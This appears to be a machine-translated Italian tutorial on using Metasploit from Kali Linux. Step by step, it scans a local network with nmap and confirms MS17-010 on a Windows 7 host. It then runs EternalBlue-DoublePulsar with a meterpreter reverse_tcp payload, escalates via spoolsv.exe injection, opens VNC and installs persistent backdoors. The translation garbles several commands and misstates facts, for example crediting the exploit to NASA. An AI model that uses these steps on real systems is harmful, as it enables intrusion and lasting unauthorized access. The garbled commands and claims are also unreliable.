Come abbiamo discusso del miglior miglior strumento Kali Linux e abbiamo messo il Metasploit all'inizio nell'elenco, ora discutiamo e apprendiamo Metasploit. Ti consigliamo di conoscere Metasploit.
Metasploit inizialmente creato da H. D Moore nel 2003, fino a quando non è stato acquisito e sviluppato ulteriormente da Rapid7 il 21 ottobre 2009. Metasploit-Framework è completamente scritto usando Ruby ed è un pacchetto standard installato nel sistema Kali Linux (e anche quasi tutti i test di penetrazione, immagino). È un kit preferito di hacker o tester per la ricerca di vulnerabilità della sicurezza, sviluppare ed eseguire exploit sugli obiettivi e altri sviluppi della sicurezza.
Metasploit viene fornito con diverse edizioni, generalmente divise in due categorie, versione gratuita e versione a pagamento. Le versioni gratuite: Metasploit Framework Community Edition (interfaccia basata sulla CLI) e Armitage (interfaccia basata sulla GUI). Le versioni a pagamento: Metasploit Express, Metasploit Pro e Cobalt Strike (è simile ad Armitage, che è fornito da Strategic Cyber LLC).
Metasploit consente agli utenti di creare (o sviluppare) il proprio codice di exploit, ma non preoccuparti se non sai come programmare, Metasploit ha così tanti moduli e vengono continuamente aggiornati. Attualmente Metasploit ha oltre 1600 exploit e 500 payloads. Il modo semplice per capire quali sono gli exploit e i payload, un exploit è fondamentalmente come l'attaccante fornisce il carico utile, attraverso il foro di vulnerabilità del sistema target. Una volta che l'attaccante ha lanciato l'exploit che contiene un carico utile contro l'obiettivo vulnerabile, quindi il payload ha distribuito (carico utile utilizzato per connettersi all'attaccante per ottenere un accesso remoto contro il sistema di destinazione), in questa fase viene eseguito l'exploit e diventa irrilevante.
"Metasploit non sta hacking di uno strumento istantaneo, è un framework folle"
Questo articolo Metasploit riguarda la conduzione di test di penetrazione rispetto a un sistema target usando il seguente flusso:
PREPARAZIONE
Assicurati che il nostro Kali Linux abbia l'ultima versione aggiornata. Ci saranno miglioramenti all'interno di ogni aggiornamento. Esegui i seguenti comandi:
~# Apt Aggiornamento
~# Apt Upgrade -y
~# apt dist -upgrade -y
Una volta aggiornata la nostra macchina, ora iniziamo accendendo la console Metasploit. Nel terminale, tipo:
~# msfconsole
E anche hai bisogno di qualsiasi editor di testo, Gedit o LeafPad, per raccogliere alcune informazioni lungo la strada prima di compilare l'attacco. In primo luogo, identifica il tuo indirizzo IP dell'interfaccia wireless, l'IP del router e la maschera di rete.
Sulla base delle informazioni sopra, noi nota l'indirizzo IP WLAN1 e il router e la maschera di rete. Quindi, la nota dovrebbe apparire così:
Attaccante IP (Lhost): 192.168.1.56
Gateway / Router's IP: 192.168.1.1
Maschera di rete: 255.255.255.0 (/24)
Passaggio 1: scansione della vulnerabilità
Nella console Metasploit, raccogliemo prima informazioni, come l'indirizzo IP di destinazione, il sistema operativo, le porte aperte e la vulnerabilità. Metasploit ci consente di eseguire NMAP direttamente dalla console. Sulla base delle informazioni sopra, eseguire questo comando per realizzare la nostra attività di raccolta delle informazioni.
msf> nmap -v 192.168.1.1/24 -Scritto Vuln -pn -o |
Dal comando sopra abbiamo ottenuto il risultato di seguito.
Abbiamo ottenuto un target vulnerabile che esegue il sistema operativo Windows e il vulnerabile è sul servizio SMBV1. Quindi, aggiungi a nota.
Target IP (rhost): 192.168.1.57
Vulnerabilità: Esecuzione del codice remoto Vulnerabilità nei server Microsoft SMBV1 (MS17-010)
Passaggio 2: valutazione della vulnerabilità
Ora conosciamo l'obiettivo e la sua vulnerabilità. Controlla la vulnerabilità nella console Metasploit
Ora conosciamo l'obiettivo e la sua vulnerabilità. Controlla la vulnerabilità nella console Metasploit usando il modulo ausiliario SMB_SCANNER. Esegui il seguente comando:
MSF> Usa ausiliario/scanner/SMB/SMB_MS17_010
MSF ausiliario (SMB_MS17_010)> Imposta RHOSTS [TARGET IP]
MSF ausiliario (SMB_MS17_010)> Esegui
Metasploit è fiducioso sulla vulnerabilità e mostra l'esatta edizione del sistema operativo Windows. Aggiungi a NOTA:
Target OS: Windows 7 Ultimate 7600
Passaggio 3: sfruttamento
Sfortunatamente, Metasploit non ha alcun modulo exploit legato a questa vulnerabilità. Ma, non preoccuparti, c'è un ragazzo fuori esposto e ha scritto il codice di exploit. L'exploit è familiare, poiché è iniziato dalla NASA si chiama EternalBlue-Doublepulsar. Puoi prenderlo da qui, oppure puoi seguire la guida dal video tutorial qui sotto per installare il codice di exploit sul tuo framework Metasploit.
Una volta che hai seguito lungo la guida sopra, (assicurati che il percorso sia uguale al tutorial). Ora sei pronto a sfruttare il bersaglio. Esegui i seguenti comandi:
Usa Exploit/Windows/SMB/EternalBlue_DoublePulsar
Imposta Windows/MeterPreter/reverse_tcp
Impostare processinject spoolsv.exe
Set rhost 192.168.1.57
Imposta Lhost 192.168.1.56
Impresa
Boom ... Exploit ha successo, abbiamo ottenuto MeterPreter Session. Come ho accennato in precedenza, una volta lanciato l'Exploit, distribuirà il payload, che è qui usato, Windows/ Windows/ Windows/ Windows/ Windows/ Windows/ Windows/meterpreter/reverse_tcp.
Passaggio 4: guadagnare accesso remoto
Esploriamo i comandi più disponibili, immettere '?'(senza punto interrogativo) e vedi comandi disponibili elencati. IL Stdapi, I comandi di sistema sono:
Per vedere ulteriori informazioni sul sistema di destinazione, utilizzare 'sysinfo'Comando. L'output dovrebbe apparire così.
Dal momento che iniettiamo il processo di sistema in precedenza (Spoolsv.Exe), abbiamo ottenuto il privilegio di sistema. Possiediamo l'obiettivo. Possiamo fare molto con il comando al target. Ad esempio, potremmo eseguire RDP o semplicemente impostare VNC Remote. Per eseguire il comando VNC Service Enter:
~# esegui VNC
Il risultato dovrebbe essere il desktop per la macchina target, è simile a questo.
La parte più importante è creare una backdoor, quindi ogni volta che il target si è disconnesso nella nostra macchina, la macchina target proverà a connettersi, di nuovo a noi. Il backdooring viene utilizzato per mantenere l'accesso, è come pescare, non ti ritorni in acqua una volta che hai ottenuto il pesce, a destra? Vuoi fare qualcosa con il pesce, sia per salvarlo in frigorifero per ulteriori azioni, come cucinarlo o venderlo per soldi.
MeterPreter ha questa funzione di backdooring persistente. Esegui il seguente comando e dai un'occhiata ai parametri e agli argomenti disponibili.
MeterPreter> eseguire la persistenza -h
Se non ti senti a tuo agio con questo script deprecato, il modulo di persistenza più recente è sotto POST/Windows/Gestione/Persvence_Exe. Puoi esplorarlo ulteriormente da solo.
Metasploit è enorme, non è solo uno strumento, è un framework, considera che ha oltre 1600 exploit e circa 500 carichi utili. Un articolo è adatto al quadro generale dell'uso o dell'idea generale. Ma hai imparato così tanto da questo articolo.
“Più segui il flusso di attacco, più hai una sfida senza sforzo."